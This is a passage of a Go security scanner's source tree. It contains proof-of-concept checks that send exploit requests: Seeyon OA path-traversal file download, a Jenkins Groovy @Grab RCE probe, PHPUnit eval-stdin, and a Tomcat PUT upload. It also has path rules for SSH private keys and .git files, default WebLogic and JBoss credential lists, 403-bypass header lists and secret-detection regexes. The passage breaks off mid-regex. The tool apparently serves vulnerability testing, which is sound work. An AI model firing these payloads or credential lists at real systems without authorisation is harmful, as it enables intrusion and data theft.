//TODO 17 | **/ 18 | 19 | func TestNuclei(t *testing.T) { 20 | logging.Logger = logging.New(false, "", "1", true) 21 | conf.GlobalConfig = &conf.Config{} 22 | 23 | conf.GlobalConfig.Http.Proxy = "http://127.0.0.1:8080" 24 | // conf.GlobalConfig.WebScan.Poc = []string{"/Users/yhy/Desktop/test.yaml"} 25 | 26 | go func() { 27 | for v := range output.OutChannel { 28 | logging.Logger.Infoln(aurora.Red(v.PrintScreen()).String()) 29 | } 30 | }() 31 | 32 | Scan("https://yarx.koalr.me/", nil) 33 | 34 | fmt.Println("wait ...") 35 | time.Sleep(5 * time.Second) 36 | } 37 | -------------------------------------------------------------------------------- /scan/Pocs/nuclei/update.go: -------------------------------------------------------------------------------- 1 | package nuclei 2 | 3 | /** 4 | @author yhy 5 | @since 2023/6/1 6 | @desc //TODO 7 | **/ 8 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/CNVD_2020_62422.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // webmail.do任意文件下载 9 | 10 | func CNVD_2020_62422(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "workflow") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/CreateMysql.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // createMysql.jsp 数据库敏感信息泄 9 | 10 | func CreateMysql(u string, client *httpx.Client) bool { 11 | if req, err := 
client.Request(u+"/yyoa/createMysql.jsp", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "root") { 13 | return true 14 | } 15 | } 16 | if req, err := client.Request(u+"/yyoa/ext/createMysql.jsp", "GET", "", nil); err == nil { 17 | if req.StatusCode == 200 && strings.Contains(req.Body, "root") { 18 | return true 19 | } 20 | } 21 | return false 22 | } 23 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/DownExcelBeanServlet.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import "github.com/yhy0/Jie/pkg/protocols/httpx" 4 | 5 | // DownExcelBeanServlet 用户敏感信息泄露 6 | 7 | func DownExcelBeanServlet(u string, client *httpx.Client) bool { 8 | if req, err := client.Request(u+"/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", "GET", "", nil); err == nil { 9 | if req.StatusCode == 200 && req.Header.Get("Content-disposition") != "" { 10 | return true 11 | } 12 | } 13 | return false 14 | } 15 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/GetSessionList.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // getSessionList.jsp session 泄露 9 | 10 | func GetSessionList(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/yyoa/ext/https/getSessionList.jsp?cmd=getAll", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "sessionID") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/InitDataAssess.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | 
"github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // initDataAssess.jsp 用户敏感信息泄露 9 | 10 | func InitDataAssess(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/yyoa/assess/js/initDataAssess.jsp", "GET", "", nil); err == nil { 12 | if req.StatusCode == 200 && strings.Contains(req.Body, "personList") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/ManagementStatus.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | // A8 状态监控页面信息泄露 9 | 10 | func ManagementStatus(u string, client *httpx.Client) bool { 11 | if req, err := client.Request(u+"/seeyon/management/index.jsp", "POST", "password=WLCCYBD@SEEYON", nil); err == nil { 12 | if req.StatusCode == 302 && strings.Contains(req.Location, "status") { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | -------------------------------------------------------------------------------- /scan/Pocs/oa/seeyon/sql.go: -------------------------------------------------------------------------------- 1 | package seeyon 2 | 3 | //'A6 test.jsp SQL注入漏洞' 4 | //'A6 setextno.jsp SQL注入漏洞' 5 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/jboss/CVE_2017_12149.go: -------------------------------------------------------------------------------- 1 | package jboss 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | ) 6 | 7 | func CVE_2017_12149(url string, client *httpx.Client) bool { 8 | if req, err := client.Request(url+"/invoker/readonly", "GET", "", nil); err == nil { 9 | if req.StatusCode == 500 { 10 | return true 11 | } 12 | } 13 | return false 14 | } 15 | -------------------------------------------------------------------------------- 
/scan/Pocs/pocs_go/jenkins/CVE_2018_1000110.go: -------------------------------------------------------------------------------- 1 | package jenkins 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | func CVE_2018_1000110(u string, client *httpx.Client) bool { 9 | if req, err := client.Request(u, "GET", "", nil); err == nil { 10 | if req.Header.Get("X-Jenkins-Session") != "" { 11 | if req2, err := client.Request(u+"/search/?q=a", "GET", "", nil); err == nil { 12 | if strings.Contains(req2.Body, "Search for 'a'") { 13 | return true 14 | } 15 | } 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/jenkins/CVE_2019_1003000.go: -------------------------------------------------------------------------------- 1 | package jenkins 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | func CVE_2019_10003000(u string, client *httpx.Client) bool { 9 | if req, err := client.Request(u, "GET", "", nil); err == nil { 10 | if req.Header.Get("X-Jenkins-Session") != "" { 11 | if req2, err := client.Request(u+"/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27vtest%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vtestvul%27,%20version=%271%27)%0aimport%20Vtest;", "GET", "", nil); err == nil { 12 | if strings.Contains(req2.Body, "package#vtestvul") { 13 | return true 14 | } 15 | } 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/phpunit/CVE_2017_9841.go: -------------------------------------------------------------------------------- 1 | package phpunit 2 | 3 | import ( 4 | "github.com/yhy0/Jie/pkg/protocols/httpx" 5 | "strings" 6 | ) 7 | 8 | func CVE_2017_9841(url string, 
client *httpx.Client) bool { 9 | if req, err := client.Request(url+"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "POST", "", nil); err == nil { 10 | if req.StatusCode == 200 && strings.Contains(req.Body, "PHP Version") { 11 | return true 12 | } 13 | } 14 | return false 15 | } 16 | -------------------------------------------------------------------------------- /scan/Pocs/pocs_go/tomcat/CVE_2017_12615.go: -------------------------------------------------------------------------------- 1 | package tomcat 2 | 3 | import "github.com/yhy0/Jie/pkg/protocols/httpx" 4 | 5 | func CVE_2017_12615(url string, client *httpx.Client) bool { 6 | if req, err := client.Request(url+"/vtset.txt", "PUT", "test", nil); err == nil { 7 | if req.StatusCode == 204 || req.StatusCode == 201 { 8 | return true 9 | } 10 | } 11 | return false 12 | } 13 | -------------------------------------------------------------------------------- /scan/bbscan/README.md: -------------------------------------------------------------------------------- 1 | ## [BBscan](https://github.com/lijiejie/bbscan) 2 | 3 | 规则含义 4 | 5 | - status 状态码 6 | - type 返回包 Content-Type 格式 7 | - type_no 返回包 Content-Type 格式不包括 8 | - tag 返回包内容匹配 9 | - root_only 只有主目录下才会存在该路径 10 | - fingprints 网站的指纹, 多种形式以 , 分割 表示或 11 | 12 | -------------------------------------------------------------------------------- /scan/bbscan/bbscan_test.go: -------------------------------------------------------------------------------- 1 | package bbscan 2 | 3 | import ( 4 | "fmt" 5 | "testing" 6 | ) 7 | 8 | /** 9 | @author yhy 10 | @since 2024/4/26 11 | @desc //TODO 12 | **/ 13 | 14 | func TestBBscan(t *testing.T) { 15 | fmt.Println(Rules["/util/exec_sh?filePath=1"]) 16 | } 17 | -------------------------------------------------------------------------------- /scan/bbscan/dicts.go: -------------------------------------------------------------------------------- 1 | package bbscan 2 | 3 | import ( 4 | "embed" 5 | _ "embed" 6 | ) 7 | 8 | //go:embed 
rules/** 9 | var rulesFiles embed.FS 10 | -------------------------------------------------------------------------------- /scan/bbscan/rules/dangerous_directory.txt: -------------------------------------------------------------------------------- 1 | # https://2015.zeronights.org/assets/files/35-Egorov.pdf webdav -> xxe 2 | /webdav {status=200} 3 | /nacos {status=200} {type="html"} {tag="nacos"} {root_only} 4 | /Dockerfile {status=200} {tag="docker"} 5 | /oauth/idp/.well-known/openid-configuration {status=200} {root_only} 6 | # 有两种情况 7 | /jmreport/testConnection {status=405} {type="html"} {tag="type=Method Not Allowed"} {root_only} 8 | /jmreport/testConnection {status=200} {type="application/json"} {tag="不支持GET请求方法"} {root_only} 9 | 10 | /webservice/ {status=200} {type="html"} {tag="Available SOAP services:"} 11 | -------------------------------------------------------------------------------- /scan/bbscan/rules/druid.txt: -------------------------------------------------------------------------------- 1 | # Druid 2 | /druid/websession.html {status=200} {type="html"} {tag="session"} {root_only} 3 | /system/druid/websession.html {status=200} {type="html"} {tag="session"} {root_only} 4 | /webpage/system/druid/websession.html(jeecg) {status=200} {type="html"} {tag="session"} {root_only} 5 | 6 | /druid/login.html {status=200} {type="html"} {tag="login"} {root_only} 7 | /system/druid/index.html {status=200} {type="html"} {tag="login"} {root_only} 8 | /webpage/system/druid/login.html {status=200} {type="html"} {tag="login"} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/git_and_svn.txt: -------------------------------------------------------------------------------- 1 | # SVN and Git 2 | /.svn/entries {status=200} {tag="-props"} 3 | /.svn/all-wcprops {status=200} {tag="svn:wc:ra_dav:version-url"} 4 | /.git/config {status=200} {tag="[core]"} 5 | /.git/index {status=200} {tag="DIRC"} 6 | /.git/HEAD 
{status=200} {tag="refs/heads/"} 7 | /.gitlab-ci.yml {status=200} {tag="stage"} -------------------------------------------------------------------------------- /scan/bbscan/rules/go_pprof_debug.txt: -------------------------------------------------------------------------------- 1 | # add golang pprof 2 | /debug/pprof/goroutine?debug=1 {status=200} {type="text/plain"} {tag="goroutine profile"} 3 | /pprof/goroutine?debug=1 {status=200} {type="text/plain"} {tag="goroutine profile"} 4 | -------------------------------------------------------------------------------- /scan/bbscan/rules/java_server_faces2.txt: -------------------------------------------------------------------------------- 1 | /javax.faces.resource.../WEB-INF/web.xml.jsf {status=200} {type="xml"} {tag="APC INFO"} {fingprints="php"} -------------------------------------------------------------------------------- /scan/bbscan/rules/phpmyadmin.txt: -------------------------------------------------------------------------------- 1 | /phpmyadmin/index.php {tag="phpMyAdmin"} {status=200} {root_only} {fingprints="php"} 2 | /phpMyAdmin/index.php {tag="<title>phpMyAdmin"} {status=200} {root_only} {fingprints="php"} 3 | /_phpmyadmin/index.php {tag="<title>phpMyAdmin"} {status=200} {root_only} {fingprints="php"} 4 | /pma/index.php {tag="<title>phpMyAdmin"} {status=200} {root_only} {fingprints="php"} -------------------------------------------------------------------------------- /scan/bbscan/rules/resin_admin.txt: -------------------------------------------------------------------------------- 1 | # Resin Doc 2 | /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile {tag="/etc/profile.d/*.sh"} {root_only} 3 | # /resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp {tag="This is the default start page for the Resin server"} {root_only} 4 | /resin-admin/ {status=200} {tag="<title>Resin Admin Login for"} {root_only} 
-------------------------------------------------------------------------------- /scan/bbscan/rules/safetyEquipment.txt: -------------------------------------------------------------------------------- 1 | # 安全设备 2 | /fort/pages/login.jsp {status=200} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/shell_script_disclosure.txt: -------------------------------------------------------------------------------- 1 | /install.sh {status=206} {root_only} {tag='#!/'} {type="text"} 2 | /deploy.sh {status=206} {root_only} {tag='#!/'} {type="text"} 3 | /upload.sh {status=206} {root_only} {tag='#!/'} {type="text"} 4 | /setup.sh {status=206} {root_only} {tag='#!/'} {type="text"} 5 | /backup.sh {status=206} {root_only} {tag='#!/'} {type="text"} 6 | /rsync.sh {status=206} {root_only} {tag='#!/'} {type="text"} 7 | /sync.sh {status=206} {root_only} {tag='#!/'} {type="text"} 8 | /test.sh {status=206} {root_only} {tag='#!/'} {type="text"} 9 | /run.sh {status=206} {root_only} {tag='#!/'} {type="text"} -------------------------------------------------------------------------------- /scan/bbscan/rules/ssh_sensitive_file.txt: -------------------------------------------------------------------------------- 1 | # SSH 2 | 3 | /.ssh/known_hosts {status=206} {type="application/octet-stream"} {root_only} 4 | /.ssh/id_rsa {status=200} {tag="PRIVATE KEY-"} {root_only} 5 | /id_rsa {status=200} {tag="PRIVATE KEY-"} {root_only} 6 | /.ssh/id_rsa.pub {status=200} {tag="ssh-rsa"} {root_only} 7 | /.ssh/id_dsa {status=200} {tag="PRIVATE KEY-"} {root_only} 8 | /id_dsa {status=200} {tag="PRIVATE KEY-"} {root_only} 9 | /.ssh/id_dsa.pub {status=200} {tag="ssh-dss"} {root_only} 10 | /.ssh/authorized_keys {status=200} {tag="ssh-rsa"} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/test_page.txt: -------------------------------------------------------------------------------- 1 | 
/test.php {status=200} {type="html"} {root_only} 2 | /test2.php {status=200} {type="html"} {root_only} 3 | # /test.html {status=200} {type="html"} {root_only} 4 | # /test2.html {status=200} {type="html"} {root_only} 5 | /test.jsp {status=200} {type="html"} {root_only} 6 | /test.txt {status=200} {type="text/plain"} {root_only} 7 | /test2.txt {status=200} {type="text/plain"} {root_only} 8 | /debug.php {status=200} {type="html"} {root_only} {fingprints="php"} 9 | /a.php {status=200} {type="html"} {root_only} {fingprints="php"} 10 | /1.php {status=200} {type="html"} {root_only} {fingprints="php"} 11 | -------------------------------------------------------------------------------- /scan/bbscan/rules/tomcat_manager.txt: -------------------------------------------------------------------------------- 1 | # Tomcat Examples 2 | # /examples/ {status=200} {type="html"} {tag="<TITLE>Apache Tomcat Examples"} {root_only} 3 | # /examples/servlets/servlet/SessionExample {status=200} {type="html"} {tag="Sessions Example"} {root_only} 4 | /manager/html {status=401} {root_only} -------------------------------------------------------------------------------- /scan/bbscan/rules/web_editors.txt: -------------------------------------------------------------------------------- 1 | # Web Editors 2 | /fckeditor/_samples/default.html {tag="FCKeditor"} {type="html"} 3 | /ckeditor/samples/ {tag="<title>CKEditor Samples"} 4 | /editor/ckeditor/samples/ {tag="CKEditor Samples"} 5 | /ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com"} 6 | /editor/ckeditor/samples/sample_posteddata.php {tag="http://ckeditor.com"} 7 | # /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php {status=200} {type="html"} {tag="init_spell()"} 8 | # /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php {status=200} {type="html"} {tag="init_spell()"} 9 | 10 | 11 | # ueditor SSRF 12 | 13 | /ueditor/ueditor.all.js {status=200} {tag="UE.version"} 14 | 
/ueditor/php/getRemoteImage.php {tag="'tip':'"} {status=200} 15 |
--------------------------------------------------------------------------------
/scan/gadget/README.md: -------------------------------------------------------------------------------- 1 | ## gadget 2 | 3 | 一些信息收集、扫描的小工具
--------------------------------------------------------------------------------
/scan/gadget/brute/dicts.go:
--------------------------------------------------------------------------------
package brute

import (
	_ "embed"
	"github.com/yhy0/Jie/pkg/util"
)

// Built-in credential dictionaries, filled once by init from the embedded
// text files below. The .txt files hold one "user,password" pair per line;
// how util.CvtUps and util.CvtLines parse them is not visible here.
//
// For defenders: these are the pairs the scanner tries, so an instance that
// accepts any of them is running with a default or trivially guessable login.
var (
	tomcatuserpass   = []util.UserPass{}
	jbossuserpass    = []util.UserPass{}
	top100pass       = []string{}
	weblogicuserpass = []util.UserPass{}
)

// Raw contents of dicts/tomcatuserpass.txt, embedded at build time.
//
//go:embed dicts/tomcatuserpass.txt
var szTomcatuserpass string

// Raw contents of dicts/jbossuserpass.txt, embedded at build time.
//
//go:embed dicts/jbossuserpass.txt
var szJbossuserpass string

// Raw contents of dicts/weblogicuserpass.txt, embedded at build time.
//
//go:embed dicts/weblogicuserpass.txt
var szWeblogicuserpass string

// Raw contents of dicts/top100pass.txt, embedded at build time.
//
//go:embed dicts/top100pass.txt
var szTop100pass string

// init converts the embedded dictionary text into the package-level lists.
func init() {
	// User/password pair lists, one per product.
	tomcatuserpass = util.CvtUps(szTomcatuserpass)
	jbossuserpass = util.CvtUps(szJbossuserpass)
	weblogicuserpass = util.CvtUps(szWeblogicuserpass)

	// Password-only list; appended so the existing (empty) slice is extended.
	top100pass = append(top100pass, util.CvtLines(szTop100pass)...)
}
--------------------------------------------------------------------------------
/scan/gadget/brute/dicts/jbossuserpass.txt: -------------------------------------------------------------------------------- 1 | jboss,jboss 2 | admin,admin 3 | jboss,123456 4 | admin,123456 5 |
--------------------------------------------------------------------------------
/scan/gadget/brute/dicts/weblogicuserpass.txt: -------------------------------------------------------------------------------- 1 | weblogic,weblogic 2 | weblogic,welcome1 3 | weblogic,Oracle@123 4 | weblogic,123456 5 | weblogic,weblogic123 6 | system,password 7 | guest,guest 8 | portaladmin,portaladmin 9 | admin,security 10 | joe,password 11 | mary,password 12 | system,security 13 | wlcsystem,wlcsystem 14 | wlcsystem,sipisystem
--------------------------------------------------------------------------------
/scan/gadget/brute/hydra/util.go:
--------------------------------------------------------------------------------
package hydra

import "strings"

/**
  @author: yhy
  @since: 2023/6/1
  @desc: //TODO
**/

// CheckErrs reports whether err's message contains, ignoring case, one of a
// fixed list of substrings that describe connection-level failures (timeouts,
// closed or refused connections, connection limits, host-based rejections).
// A nil err yields false.
//
// NOTE(review): presumably callers use this to tell a transport problem from a
// rejected credential; confirm at the call sites. Matching is by substring, so
// short markers such as "EOF" also match unrelated messages that happen to
// contain those letters.
func CheckErrs(err error) bool {
	if err == nil {
		return false
	}

	// Lower-case the message once; every marker is compared against this copy.
	msg := strings.ToLower(err.Error())

	markers := [...]string{
		"closed by the remote host",
		"too many connections",
		"i/o timeout",
		"EOF",
		"A connection attempt failed",
		"established connection failed",
		"connection attempt failed",
		"Unable to read",
		"is not allowed to connect to this",
		"no pg_hba.conf entry",
		"No connection could be made",
		"invalid packet size",
		"bad connection",
	}
	for _, marker := range markers {
		if strings.Contains(msg, strings.ToLower(marker)) {
			return true
		}
	}
	return false
}
--------------------------------------------------------------------------------
/scan/gadget/bypass403/dict/endpaths.txt: -------------------------------------------------------------------------------- 1 | ? 2 | ??
3 | / 4 | // 5 | /. 6 | /./ 7 | /..;/ 8 | ..\;/ 9 | ..;/ 10 | ~ 11 | °/ 12 | # 13 | #/ 14 | #/./ 15 | #test 16 | %00 17 | %09 18 | %0A 19 | %0D 20 | %20 21 | %20/ 22 | %25 23 | %23 24 | %26 25 | %3f 26 | %61 27 | & 28 | - 29 | . 30 | ..; 31 | ..\; 32 | ./ 33 | .css 34 | .html 35 | .json 36 | .php 37 | .random 38 | .svc 39 | .svc?wsdl 40 | .wsdl 41 | / 42 | // 43 | 0 44 | 1 45 | ? 46 | ?? 47 | ??? 48 | ?WSDL 49 | ?debug=1 50 | ?debug=true 51 | ?param 52 | ?testparam 53 | \/\/ 54 | debug 55 | false 56 | null 57 | true 58 | ~ 59 | /..%3B/ 60 | /* 61 | -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/headers.txt: -------------------------------------------------------------------------------- 1 | Access-Control-Allow-Origin 2 | Base-Url 3 | CF-Connecting-IP 4 | CF-Connecting_IP 5 | Client-IP 6 | Destination 7 | Forwarded 8 | Forwarded-For 9 | Forwarded-For-Ip 10 | Host 11 | Http-Url 12 | Origin 13 | Profile 14 | Proxy 15 | Proxy-Host 16 | Proxy-Url 17 | Real-Ip 18 | Redirect 19 | Referer 20 | Referrer 21 | Request-Uri 22 | True-Client-IP 23 | Uri 24 | Url 25 | X-Arbitrary 26 | X-Client-IP 27 | X-Custom-IP-Authorization 28 | X-Forward 29 | X-Forward-For 30 | X-Forwarded 31 | X-Forwarded-By 32 | X-Forwarded-For 33 | X-Forwarded-For-Original 34 | X-Forwarded-Host 35 | X-Forwarded-Proto 36 | X-Forwarded-Server 37 | X-Forwarder-For 38 | X-Host 39 | X-HTTP-DestinationURL 40 | X-HTTP-Host-Override 41 | X-Original-Remote-Addr 42 | X-Original-URL 43 | X-Originally-Forwarded-For 44 | X-Originating-IP 45 | X-Proxy-Url 46 | X-ProxyUser-Ip 47 | X-Real-IP 48 | X-Referrer 49 | X-Remote-Addr 50 | X-Remote-IP 51 | X-Rewrite-URL 52 | X-WAP-Profile 53 | X-Real-Ip 54 | X-True-IP -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/httpmethods.txt: -------------------------------------------------------------------------------- 1 | CONNECT 2 | COPY 3 | DELETE 4 | GET 5 | HEAD 
6 | LABEL 7 | LOCK 8 | MOVE 9 | OPTIONS 10 | PATCH 11 | POST 12 | POUET 13 | PUT 14 | TRACE 15 | TRACK 16 | UNCHECKOUT 17 | UPDATE 18 | VERSION-CONTROL -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/ips.txt: -------------------------------------------------------------------------------- 1 | * 2 | 0 3 | 0.0.0.0 4 | 0177.0000.0000.0001 5 | 0177.1 6 | 0x7F000001 7 | 10.0.0.0 8 | 10.0.0.1 9 | 127.0.0.1 10 | 127.0.0.1:443 11 | 127.0.0.1:80 12 | 127.1 13 | 172.16.0.0 14 | 172.16.0.1 15 | 172.17.0.1 16 | 192.168.0.2 17 | 192.168.1.0 18 | 192.168.1.1 19 | 2130706433 20 | 8.8.8.8 21 | localhost 22 | localhost:443 23 | localhost:80 24 | norealhost 25 | null -------------------------------------------------------------------------------- /scan/gadget/bypass403/dict/simpleheaders.txt: -------------------------------------------------------------------------------- 1 | Referer /admin 2 | X-HTTP-Method-Override POST 3 | X-HTTP-Method-Override PUT 4 | X-Original-URL /admin 5 | X-Override-URL /admin 6 | X-Rewrite-URL /admin 7 | X-Forwarded-Port 80 8 | X-Forwarded-Port 443 9 | X-Forwarded-Port 4443 10 | X-Forwarded-Port 8080 11 | X-Forwarded-Port 8443 -------------------------------------------------------------------------------- /scan/gadget/collection/README.md: -------------------------------------------------------------------------------- 1 | ## 信息收集 2 | 3 | 提取自 https://github.com/pingc0y/URLFinder 4 | https://github.com/momosecurity/FindSomething 5 | 6 | - 域名 7 | - ip 8 | - 邮箱 9 | - 手机 10 | - 身份证 11 | - API -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/adafruit-key.yaml: -------------------------------------------------------------------------------- 1 | id: adafruit-key 2 | 3 | info: 4 | name: Adafruit API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - 
https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adafruit-api-key.go 10 | metadata: 11 | verified: true 12 | tags: adafruit,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:adafruit)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100e18e66c25918d1d8e980ab39a1d206e65dc34ef8b6ae0e043c87d34f0496d4260220651cd87fb75b897e27766f354e0711534ef67b6f368885d00fbf79ed44ed72a7:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/adobe/adobe-client.yaml: -------------------------------------------------------------------------------- 1 | id: adobe-client 2 | 3 | info: 4 | name: Adobe Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,adobe,token 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)(?:adobe)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) 23 | # digest: 490a00463044022007eda94aded10055c992548f92f163ce142cfa63312df87ab1913d55655c84a402205cfb63b7803c40be56e370f98a2541ef20c37455b0b0f136a5c19164ee802429:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/age/age-identity-secret-key.yaml: 
-------------------------------------------------------------------------------- 1 | id: age-identity-secret-key 2 | 3 | info: 4 | name: Age Identity (X22519 secret key) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml 9 | - https://github.com/FiloSottile/age/blob/main/doc/age.1.html 10 | - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type 11 | metadata: 12 | verified: true 13 | tags: file,keys,age-encryption,token 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - '\bAGE-SECRET-KEY-1[0-9A-Z]{58}\b' 24 | # digest: 4a0a00473045022100967a33608a1ecaa232719a64590ae179e82473d9ff9960e1294033f41dcfafb3022011659ec4586dff37d9381700897e858d37c2b363d718315d96fa9db721bc7123:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/age/age-recipient-public-key.yaml: -------------------------------------------------------------------------------- 1 | id: age-recipient-public-key 2 | 3 | info: 4 | name: Age Recipient (X25519 public key) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml 9 | - https://github.com/FiloSottile/age/blob/main/doc/age.1.html 10 | - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type 11 | metadata: 12 | verified: true 13 | tags: file,keys,age-encryption,token 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - '\bage1[0-9a-z]{58}\b' 24 | # digest: 4b0a004830460221008efb372243352ac7767832750aa04221c747bfb407e0d3599f6716055832807402210084c3968cf28f080a9a1ef95e6cd8a9029e85c7fa0d051df56217ecc16d6aafb9:922c64590222798bb761d5b6d8e72950 
-------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/airtable-key.yaml: -------------------------------------------------------------------------------- 1 | id: airtable-key 2 | 3 | info: 4 | name: Airtable API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go 10 | metadata: 11 | verified: true 12 | tags: keys,file,airtable,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | # digest: 490a004630440220673067de4dbbe1d9d4f9337d2eddd6903ed401646b5e2ef23b4cb4fbc15e4bb40220774a7aafc56f3023bd7d681d429badb45d714352a8fcb74844e5913b116cfce2:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/algolia-key.yaml: -------------------------------------------------------------------------------- 1 | id: algolia-key 2 | 3 | info: 4 | name: Algolia API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/algolia-api-key.go 10 | metadata: 11 | verified: true 12 | tags: algolia,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:algolia)(?:[0-9a-z\-_\t 